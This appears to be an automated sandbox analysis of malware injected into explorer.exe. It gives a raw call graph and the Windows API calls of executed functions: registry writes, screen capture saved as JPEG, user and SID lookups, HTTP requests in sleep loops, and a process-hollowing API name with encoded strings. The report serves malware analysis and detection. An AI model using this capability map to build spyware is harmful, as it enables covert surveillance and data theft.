__ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34112 320b4a7 34110->34112 34111->34110 34113 320b700 34112->34113 34114 3223340 70 API calls 34113->34114 34115 320b742 34114->34115 34116 32061f0 114 API calls 34115->34116 34117 320b74a 34116->34117 34281 320a270 GetTempPathA 34117->34281 34120 3225740 27 API calls 34121 320b76f GetFileAttributesA 34120->34121 34122 320b788 _AnonymousOriginator 34121->34122 34123 320b853 _AnonymousOriginator 34122->34123 34124 320c689 34122->34124 34127 3223340 70 API calls 34123->34127 34237 320b861 34123->34237 34125 322f02c 25 API calls 34124->34125 34126 320c6c5 34125->34126 34129 320b87c 34127->34129 34128 3224250 27 API calls 34131 320c675 GetModuleFileNameA 34128->34131 34130 32061f0 114 API calls 34129->34130 34132 320b884 34130->34132 34131->33491 34133 320a270 115 API calls 34132->34133 34134 320b898 34133->34134 34135 3225740 27 API calls 34134->34135 34136 320b8a9 GetFileAttributesA 34135->34136 34137 320b8c2 _AnonymousOriginator 34136->34137 34138 3223340 70 API calls 34137->34138 34137->34237 34139 320b9b6 34138->34139 34140 32061f0 114 API calls 34139->34140 34141 320b9be 34140->34141 34142 320a270 115 API calls 34141->34142 34143 320b9d2 34142->34143 34144 3225740 27 API calls 34143->34144 34145 320b9e3 GetFileAttributesA 34144->34145 34146 320b9fc _AnonymousOriginator 34145->34146 34147 3223340 70 API calls 34146->34147 34146->34237 34148 320baf0 34147->34148 34149 32061f0 114 API calls 34148->34149 34150 320baf8 34149->34150 34151 320a270 115 API calls 34150->34151 34152 320bb0c 34151->34152 34153 3225740 27 API calls 34152->34153 34154 320bb1d GetFileAttributesA 34153->34154 34155 320bb36 _AnonymousOriginator 34154->34155 34156 3223340 70 API calls 34155->34156 34155->34237 34157 320bc2a 34156->34157 34158 32061f0 114 API calls 34157->34158 34159 320bc32 34158->34159 34160 320a270 115 API calls 34159->34160 34161 320bc46 34160->34161 34162 3225740 27 API calls 34161->34162 34163 320bc57 GetFileAttributesA 34162->34163 34164 320bc70 _AnonymousOriginator 34163->34164 34165 3223340 70 API calls 34164->34165 34164->34237 34166 320bd64 34165->34166 34167 32061f0 114 API calls 34166->34167 34168 320bd6c 34167->34168 34169 320a270 115 API calls 34168->34169 34170 320bd80 34169->34170 34171 3225740 27 API calls 34170->34171 34172 320bd91 GetFileAttributesA 34171->34172 34173 320bdaa _AnonymousOriginator 34172->34173 34174 3223340 70 API calls 34173->34174 34173->34237 34175 320be9e 34174->34175 34176 32061f0 114 API calls 34175->34176 34177 320bea6 34176->34177 34178 320a270 115 API calls 34177->34178 34179 320beba 34178->34179 34180 3225740 27 API calls 34179->34180 34181 320becb GetFileAttributesA 34180->34181 34182 320bee4 _AnonymousOriginator 34181->34182 34183 3223340 70 API calls 34182->34183 34182->34237 34184 320bfd8 34183->34184 34185 32061f0 114 API calls 34184->34185 34186 320bfe0 34185->34186 34187 320a270 115 API calls 34186->34187 34188 320bff4 34187->34188 34189 3225740 27 API calls 34188->34189 34190 320c005 GetFileAttributesA 34189->34190 34191 320c01e _AnonymousOriginator 34190->34191 34192 3223340 70 API calls 34191->34192 34191->34237 34193 320c112 34192->34193 34194 32061f0 114 API calls 34193->34194 34195 320c11a 34194->34195 34196 320a270 115 API calls 34195->34196 34197 320c12e 34196->34197 34198 3225740 27 API calls 34197->34198 34199 320c13f GetFileAttributesA 34198->34199 34200 320c158 _AnonymousOriginator 34199->34200 34201 3223340 70 API calls 34200->34201 34200->34237 34202 320c24c 34201->34202 34203 32061f0 114 API calls 34202->34203 34204 320c254 34203->34204 34205 320a270 115 API calls 34204->34205 34206 320c268 34205->34206 34207 3225740 27 API calls 34206->34207 34208 320c279 GetFileAttributesA 34207->34208 34209 320c292 _AnonymousOriginator 34208->34209 34210 3223340 70 API calls 34209->34210 34209->34237 34211 320c386 34210->34211 34212 32061f0 114 API calls 34211->34212 34213 320c38e 34212->34213 34214 320a270 115 API calls 34213->34214 34215 320c3a2 34214->34215 34216 3225740 27 API calls 34215->34216 34217 320c3b3 GetFileAttributesA 34216->34217 34219 320c3cc _AnonymousOriginator 34217->34219 34218 3223340 70 API calls 34220 320c4c0 34218->34220 34219->34218 34219->34237 34221 32061f0 114 API calls 34220->34221 34222 320c4cb 34221->34222 34223 320a270 115 API calls 34222->34223 34224 320c4e2 34223->34224 34225 3225740 27 API calls 34224->34225 34226 320c4f3 GetFileAttributesA 34225->34226 34228 320c50c _AnonymousOriginator 34226->34228 34227 32093d0 132 API calls 34229 320c61a 34227->34229 34228->34227 34228->34237 34230 32093d0 132 API calls 34229->34230 34229->34237 34231 320c624 34230->34231 34232 32093d0 132 API calls 34231->34232 34231->34237 34233 320c62e 34232->34233 34234 32093d0 132 API calls 34233->34234 34233->34237 34235 320c638 34234->34235 34236 32093d0 132 API calls 34235->34236 34235->34237 34236->34237 34237->34128 34239 3209e46 34238->34239 34240 3209e78 _AnonymousOriginator 34239->34240 34242 3209e93 34239->34242 34241 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34240->34241 34243 3209e8f 34241->34243 34244 322f02c 25 API calls 34242->34244 34243->33496 34245 3209e98 34244->34245 34247 3224909 34246->34247 34248 322491d _Yarn 34247->34248 34298 32254c0 27 API calls 3 library calls 34247->34298 34248->33553 34250->33611 34251->33614 34252->33953 34255 3209436 GetVersionExW 34254->34255 34255->33957 34255->34017 34256->34014 34257->34024 34258->34039 34259->34053 34260->34067 34263 322302b 34261->34263 34274 3223114 _Yarn _AnonymousOriginator 34261->34274 34262 32231a1 34279 32026a0 27 API calls 34262->34279 34263->34262 34267 32230c1 34263->34267 34268 322309a 34263->34268 34273 32230ab _Yarn 34263->34273 34263->34274 34265 32231a6 34280 32025c0 27 API calls 2 library calls 34265->34280 34267->34273 34278 32025c0 27 API calls 3 library calls 34267->34278 34268->34265 34277 32025c0 27 API calls 3 library calls 34268->34277 34269 32231ab 34272 322f02c 25 API calls 34272->34262 34273->34272 34273->34274 34274->34109 34275->34107 34277->34273 34278->34273 34280->34269 34282 3223340 70 API calls 34281->34282 34283 320a2cc 34282->34283 34284 32061f0 114 API calls 34283->34284 34285 320a2d7 34284->34285 34286 3224250 27 API calls 34285->34286 34287 320a32d 34286->34287 34288 3224250 27 API calls 34287->34288 34289 320a389 34288->34289 34290 3225740 27 API calls 34289->34290 34295 320a3a2 _AnonymousOriginator 34290->34295 34291 320a465 34294 322f02c 25 API calls 34291->34294 34292 320a43e _AnonymousOriginator 34293 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34292->34293 34296 320a461 34293->34296 34297 320a46a 34294->34297 34295->34291 34295->34292 34296->34120 34298->34248 34302 3220d20 34299->34302 34300 3223340 70 API calls 34300->34302 34301 32061f0 114 API calls 34301->34302 34302->34300 34302->34301 34305 321eca0 34302->34305 34304 3220d6c Sleep 34304->34302 34306 321ecdc 34305->34306 34310 321f3ce _AnonymousOriginator 34305->34310 34307 3223340 70 API calls 34306->34307 34306->34310 34311 321ecfd 34307->34311 34308 321f444 _AnonymousOriginator 34312 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34308->34312 34309 321f4a1 34314 322f02c 25 API calls 34309->34314 34310->34308 34310->34309 34315 32061f0 114 API calls 34311->34315 34313 321f466 34312->34313 34313->34304 34320 321f4a6 34314->34320 34316 321ed04 34315->34316 34317 3223340 70 API calls 34316->34317 34318 321ed16 34317->34318 34319 3223340 70 API calls 34318->34319 34321 321ed28 34319->34321 34322 32078e0 27 API calls 34320->34322 34609 32105b0 34321->34609 34324 321f4f8 34322->34324 34326 3223280 25 API calls 34324->34326 34327 321f506 34326->34327 34330 321f536 _AnonymousOriginator 34327->34330 34334 3220cca 34327->34334 34328 3223340 70 API calls 34329 321ed49 34328->34329 34331 3223340 70 API calls 34329->34331 34332 32093d0 132 API calls 34330->34332 34333 321ed61 34331->34333 34335 321f545 34332->34335 34336 32061f0 114 API calls 34333->34336 34338 322f02c 25 API calls 34334->34338 34337 32043e0 27 API calls 34335->34337 34339 321ed68 34336->34339 34340 321f552 34337->34340 34341 3220ce3 34338->34341 34640 3209c20 34339->34640 34343 3209a20 118 API calls 34340->34343 34345 321f55e 34343->34345 34346 32043e0 27 API calls 34345->34346 34349 321f56b RegOpenKeyExA RegCloseKey 34346->34349 34347 3223340 70 API calls 34350 321ed90 34347->34350 34348 3223340 70 API calls 34351 321f01b 34348->34351 34352 32043e0 27 API calls 34349->34352 34354 3223340 70 API calls 34350->34354 34355 3223340 70 API calls 34351->34355 34353 321f5bb 34352->34353 34357 3223340 70 API calls 34353->34357 34358 321eda8 34354->34358 34356 321f030 34355->34356 34359 3223340 70 API calls 34356->34359 34360 321f5d9 34357->34360 34361 32061f0 114 API calls 34358->34361 34362 321f042 34359->34362 34363 32061f0 114 API calls 34360->34363 34364 321edaf 34361->34364 34365 32105b0 121 API calls 34362->34365 34366 321f5e0 34363->34366 34367 3209c20 27 API calls 34364->34367 34368 321f04e 34365->34368 34369 3223340 70 API calls 34366->34369 34370 321edbb 34367->34370 34371 3223340 70 API calls 34368->34371 34372 321f5f5 34369->34372 34373 3223340 70 API calls 34370->34373 34478 321eff5 34370->34478 34374 321f063 34371->34374 34375 32061f0 114 API calls 34372->34375 34376 321edd8 34373->34376 34377 3223340 70 API calls 34374->34377 34378 321f5fc 34375->34378 34379 32061f0 114 API calls 34376->34379 34380 321f07b 34377->34380 34382 321f613 GetUserNameA 34378->34382 34386 321ede0 34379->34386 34381 32061f0 114 API calls 34380->34381 34383 321f082 34381->34383 34384 321f666 34382->34384 34385 3209c20 27 API calls 34383->34385 34384->34384 34388 3224250 27 API calls 34384->34388 34387 321f08e 34385->34387 34389 321ee31 34386->34389 34390 321f46a 34386->34390 34394 3223340 70 API calls 34387->34394 34404 321f35e _AnonymousOriginator 34387->34404 34391 321f682 34388->34391 34393 3224250 27 API calls 34389->34393 34655 3224760 27 API calls 34390->34655 34395 320b250 28 API calls 34391->34395 34398 321ee4e 34393->34398 34399 321f0aa 34394->34399 34396 321f691 34395->34396 34401 320b700 145 API calls 34396->34401 34397 321f46f 34402 322f02c 25 API calls 34397->34402 34405 3223280 25 API calls 34398->34405 34400 3223340 70 API calls 34399->34400 34406 321f0c2 34400->34406 34407 321f6a0 GetModuleFileNameA 34401->34407 34409 321f474 34402->34409 34403 321f49c 34408 322f02c 25 API calls 34403->34408 34404->34310 34404->34403 34416 321ee5a _AnonymousOriginator 34405->34416 34410 32061f0 114 API calls 34406->34410 34411 321f6e3 34407->34411 34408->34309 34412 322f02c 25 API calls 34409->34412 34413 321f0c9 34410->34413 34411->34411 34418 3224250 27 API calls 34411->34418 34415 321f479 34412->34415 34417 3209c20 27 API calls 34413->34417 34414 321eebc _AnonymousOriginator 34420 3223340 70 API calls 34414->34420 34656 322865c 27 API calls 2 library calls 34415->34656 34416->34397 34416->34414 34421 321f0d5 34417->34421 34422 321f6fb 34418->34422 34424 321eed5 34420->34424 34421->34404 34428 3223340 70 API calls 34421->34428 34425 3209e20 25 API calls 34422->34425 34423 321f483 34657 3224760 27 API calls 34423->34657 34427 32061f0 114 API calls 34424->34427 34429 321f700 34425->34429 34437 321eedd 34427->34437 34431 321f0f2 34428->34431 34432 32043e0 27 API calls 34429->34432 34430 321f488 34658 322869c 27 API calls 2 library calls 34430->34658 34434 32061f0 114 API calls 34431->34434 34435 321f71d 34432->34435 34447 321f0fa 34434->34447 34438 3223340 70 API calls 34435->34438 34436 321f492 34439 322f02c 25 API calls 34436->34439 34440 3224250 27 API calls 34437->34440 34441 321f737 34438->34441 34442 321f497 34439->34442 34444 321ef3b 34440->34444 34445 32061f0 114 API calls 34441->34445 34443 322f02c 25 API calls 34442->34443 34443->34403 34446 3223280 25 API calls 34444->34446 34448 321f742 34445->34448 34458 321ef47 _AnonymousOriginator 34446->34458 34447->34423 34449 321f14b 34447->34449 34450 32043e0 27 API calls 34448->34450 34451 3224250 27 API calls 34449->34451 34452 321f759 34450->34452 34453 321f168 34451->34453 34454 3223340 70 API calls 34452->34454 34456 3223280 25 API calls 34453->34456 34457 321f76f 34454->34457 34455 321efa9 _AnonymousOriginator 34455->34478 34652 320b5f0 114 API calls 3 library calls 34455->34652 34468 321f174 _AnonymousOriginator 34456->34468 34459 32061f0 114 API calls 34457->34459 34458->34409 34458->34455 34461 321f77a 34459->34461 34463 3223340 70 API calls 34461->34463 34462 321efc1 34462->34478 34653 3231262 14 API calls __dosmaperr 34462->34653 34466 321f79d 34463->34466 34464 321f1d6 _AnonymousOriginator 34465 3223340 70 API calls 34464->34465 34469 321f1ef 34465->34469 34470 32061f0 114 API calls 34466->34470 34468->34436 34468->34464 34472 32061f0 114 API calls 34469->34472 34473 321f7a8 34470->34473 34471 321efca 34474 3231b97 40 API calls 34471->34474 34480 321f1f7 34472->34480 34475 3223340 70 API calls 34473->34475 34476 321efe9 34474->34476 34477 321f7cb 34475->34477 34476->34415 34476->34478 34479 32061f0 114 API calls 34477->34479 34478->34348 34478->34430 34481 321f7d6 34479->34481 34482 3224250 27 API calls 34480->34482 34483 3223340 70 API calls 34481->34483 34484 321f255 34482->34484 34485 321f7f9 34483->34485 34486 3223280 25 API calls 34484->34486 34487 32061f0 114 API calls 34485->34487 34493 321f261 _AnonymousOriginator 34486->34493 34488 321f804 34487->34488 34489 3223340 70 API calls 34488->34489 34490 321f827 34489->34490 34492 32061f0 114 API calls 34490->34492 34491 321f2c3 _AnonymousOriginator 34494 3223340 70 API calls 34491->34494 34495 321f832 34492->34495 34493->34442 34493->34491 34496 321f2de 34494->34496 34497 3223340 70 API calls 34495->34497 34498 3223340 70 API calls 34496->34498 34499 321f855 34497->34499 34500 321f2f3 34498->34500 34501 32061f0 114 API calls 34499->34501 34502 3223340 70 API calls 34500->34502 34503 321f860 34501->34503 34504 321f30e 34502->34504 34505 3223340 70 API calls 34503->34505 34506 32061f0 114 API calls 34504->34506 34507 321f883 34505->34507 34508 321f315 34506->34508 34509 32061f0 114 API calls 34507->34509 34512 3224250 27 API calls 34508->34512 34511 321f88e 34509->34511 34513 3223340 70 API calls 34511->34513 34514 321f352 34512->34514 34515 321f8b1 34513->34515 34654 321e870 161 API calls 3 library calls 34514->34654 34517 32061f0 114 API calls 34515->34517 34518 321f8bc 34517->34518 34520 3223340 70 API calls 34518->34520 34519 321f35b 34519->34404 34521 321f8dd 34520->34521 34522 32061f0 114 API calls 34521->34522 34523 321f8e8 34522->34523 34524 3223340 70 API calls 34523->34524 34525 321f8fa 34524->34525 34526 32061f0 114 API calls 34525->34526 34527 321f905 34526->34527 34528 3223340 70 API calls 34527->34528 34529 321f917 34528->34529 34530 32061f0 114 API calls 34529->34530 34531 321f922 34530->34531 34532 3223340 70 API calls 34531->34532 34533 321f93f 34532->34533 34534 32061f0 114 API calls 34533->34534 34535 321f94a 34534->34535 34536 32248f0 27 API calls 34535->34536 34537 321f95e 34536->34537 34538 3225740 27 API calls 34537->34538 34539 321f978 34538->34539 34540 3225740 27 API calls 34539->34540 34541 321f995 34540->34541 34542 3225740 27 API calls 34541->34542 34543 321f9b2 34542->34543 34544 32248f0 27 API calls 34543->34544 34545 321f9c7 34544->34545 34546 3225740 27 API calls 34545->34546 34547 321f9e6 34546->34547 34548 32248f0 27 API calls 34547->34548 34549 321f9fb 34548->34549 34550 3225740 27 API calls 34549->34550 34551 321fa1a 34550->34551 34552 32248f0 27 API calls 34551->34552 34553 321fa2f 34552->34553 34554 3225740 27 API calls 34553->34554 34555 321fa4e 34554->34555 34556 32248f0 27 API calls 34555->34556 34557 321fa63 34556->34557 34558 3225740 27 API calls 34557->34558 34559 321fa82 34558->34559 34560 32248f0 27 API calls 34559->34560 34561 321fa97 34560->34561 34562 3225740 27 API calls 34561->34562 34563 321fab6 34562->34563 34564 32248f0 27 API calls 34563->34564 34565 321facb 34564->34565 34566 3225740 27 API calls 34565->34566 34567 321faea 34566->34567 34568 32248f0 27 API calls 34567->34568 34569 321faff 34568->34569 34570 3225740 27 API calls 34569->34570 34571 321fb1e 34570->34571 34572 32248f0 27 API calls 34571->34572 34573 321fb33 34572->34573 34574 3225740 27 API calls 34573->34574 34575 321fb52 34574->34575 34576 3225740 27 API calls 34575->34576 34577 321fb74 34576->34577 34578 3225740 27 API calls 34577->34578 34579 321fb96 34578->34579 34580 32248f0 27 API calls 34579->34580 34581 321fbab _AnonymousOriginator 34580->34581 34582 32207d3 34581->34582 34583 32208a8 34581->34583 34584 3223340 70 API calls 34582->34584 34585 3223340 70 API calls 34583->34585 34586 32207e9 34584->34586 34587 32208bd 34585->34587 34588 32061f0 114 API calls 34586->34588 34589 3223340 70 API calls 34587->34589 34590 32207f4 34588->34590 34591 32208d2 34589->34591 34592 32248f0 27 API calls 34590->34592 34659 3204d60 27 API calls _AnonymousOriginator 34591->34659 34594 3220808 34592->34594 34597 3223280 25 API calls 34594->34597 34595 32208e1 34660 320cb00 27 API calls 34595->34660 34607 3220816 _AnonymousOriginator 34597->34607 34598 32208f2 34599 3223340 70 API calls 34598->34599 34600 3220907 34599->34600 34601 32061f0 114 API calls 34600->34601 34602 3220912 34601->34602 34603 3225740 27 API calls 34602->34603 34604 322092c 34603->34604 34605 3223280 25 API calls 34604->34605 34605->34607 34606 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34608 3220cc6 34606->34608 34607->34606 34608->34304 34610 3210602 34609->34610 34611 3210a07 34609->34611 34610->34611 34613 3210616 Sleep InternetOpenW InternetConnectA 34610->34613 34612 3224250 27 API calls 34611->34612 34622 32109b4 _AnonymousOriginator 34612->34622 34614 3223340 70 API calls 34613->34614 34615 32106a2 34614->34615 34617 32061f0 114 API calls 34615->34617 34616 3210a02 _AnonymousOriginator 34619 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34616->34619 34620 32106ad HttpOpenRequestA 34617->34620 34618 3210adb 34621 322f02c 25 API calls 34618->34621 34623 3210ac8 34619->34623 34626 32106d6 _AnonymousOriginator 34620->34626 34625 3210ae0 34621->34625 34622->34616 34622->34618 34623->34328 34627 3223340 70 API calls 34626->34627 34628 321073e 34627->34628 34629 32061f0 114 API calls 34628->34629 34630 3210749 34629->34630 34631 3223340 70 API calls 34630->34631 34632 3210762 34631->34632 34633 32061f0 114 API calls 34632->34633 34634 321076d HttpSendRequestA 34633->34634 34637 3210790 _AnonymousOriginator 34634->34637 34636 3210818 InternetReadFile 34638 321083f _Yarn 34636->34638 34637->34636 34639 32108bf InternetReadFile 34638->34639 34639->34638 34641 3209d43 _AnonymousOriginator 34640->34641 34651 3209c7c _AnonymousOriginator 34640->34651 34645 3209e0f 34641->34645 34646 3209de3 _AnonymousOriginator 34641->34646 34642 3209e0a 34661 3224760 27 API calls 34642->34661 34643 3224250 27 API calls 34643->34651 34648 322f02c 25 API calls 34645->34648 34647 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34646->34647 34649 3209e06 34647->34649 34650 3209e14 34648->34650 34649->34347 34649->34478 34651->34641 34651->34642 34651->34643 34651->34645 34652->34462 34653->34471 34654->34519 34659->34595 34660->34598

                                                  Executed Functions

                                                  Function 032061F0 Relevance: 99.7, APIs: 40, Strings: 16, Instructions: 1737registrywindowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                  • RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                  • RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                  • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                  • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                  • RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                  • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                    • Part of subcall function 032061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 032068E0
                                                  • RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  • RegCloseKey.ADVAPI32(?), ref: 03206D5E
                                                  • GdiplusStartup.GDIPLUS(?,?,00000000,74D40A26,00000000), ref: 03206DEA
                                                  • GetDC.USER32(00000000), ref: 03206F62
                                                  • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032071CD
                                                  • GetSystemMetrics.USER32(00000000), ref: 03207226
                                                  • GetSystemMetrics.USER32(00000000), ref: 0320722F
                                                  • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 03207277
                                                  • GetSystemMetrics.USER32(00000001), ref: 032072CA
                                                  • GetSystemMetrics.USER32(00000001), ref: 032072D3
                                                  • CreateCompatibleDC.GDI32(?), ref: 032072DF
                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 032072F4
                                                  • SelectObject.GDI32(00000000,00000000), ref: 03207304
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0320732A
                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0320733E
                                                  • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0320735A
                                                  • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 03207387
                                                  • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0320740E
                                                  • SelectObject.GDI32(00000000,?), ref: 0320741B
                                                  • DeleteObject.GDI32(00000000), ref: 03207428
                                                  • DeleteObject.GDI32(?), ref: 03207430
                                                  • ReleaseDC.USER32(00000000,?), ref: 0320743A
                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 03207441
                                                  • GdiplusShutdown.GDIPLUS(?), ref: 032074E3
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 032075BA
                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 03207600
                                                  • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0320760D
                                                  • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03207721
                                                  • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 03207748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                  • String ID: $($JI2xaL==$LIWxaL==$MtBBJywTQ32=$MtBBJywTQUo=$MtBBJywTQkM=$MtBBJywTQkQ=$NtUnmapViewOfSection$Uo1q9CQm$VcmpWR5CVB==$XtBBJyw=$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                  • API String ID: 1729688432-4143275530
                                                  • Opcode ID: 8d288c7a70a84e6b3fbc130ba66de789c413f5696ffd40ccd06751c092c31dcd
                                                  • Instruction ID: 0559a4b201110144cbdfc59ca1095f4ecfa143953f8cef390c891bb3d6e4b2b7
                                                  • Opcode Fuzzy Hash: 8d288c7a70a84e6b3fbc130ba66de789c413f5696ffd40ccd06751c092c31dcd
                                                  • Instruction Fuzzy Hash: 9BD2F671A20218AFDB18DF68CC84BDDBB75EF44300F548298E415AB2D6DB759AD8CF90
                                                  Function 0320B700 Relevance: 32.7, APIs: 12, Strings: 6, Instructions: 1232COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0320A270: GetTempPathA.KERNEL32(00000104,?,74D40A26,?,00000000), ref: 0320A2B7
                                                  • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0320B77B
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320B8B5
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320B9EF
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BB29
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BC63
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BD9D
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BED7
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C011
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                    • Part of subcall function 032061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 032068E0
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C14B
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C285
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C3BF
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(?), ref: 03206D5E
                                                  • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0320C4FF
                                                    • Part of subcall function 032093D0: GetVersionExW.KERNEL32(0000011C,74D40A26,774D0F00), ref: 0320944A
                                                    • Part of subcall function 032093D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032094AB
                                                    • Part of subcall function 032093D0: GetProcAddress.KERNEL32(00000000), ref: 032094B2
                                                    • Part of subcall function 032093D0: GetNativeSystemInfo.KERNELBASE(?), ref: 03209573
                                                    • Part of subcall function 032093D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03209577
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
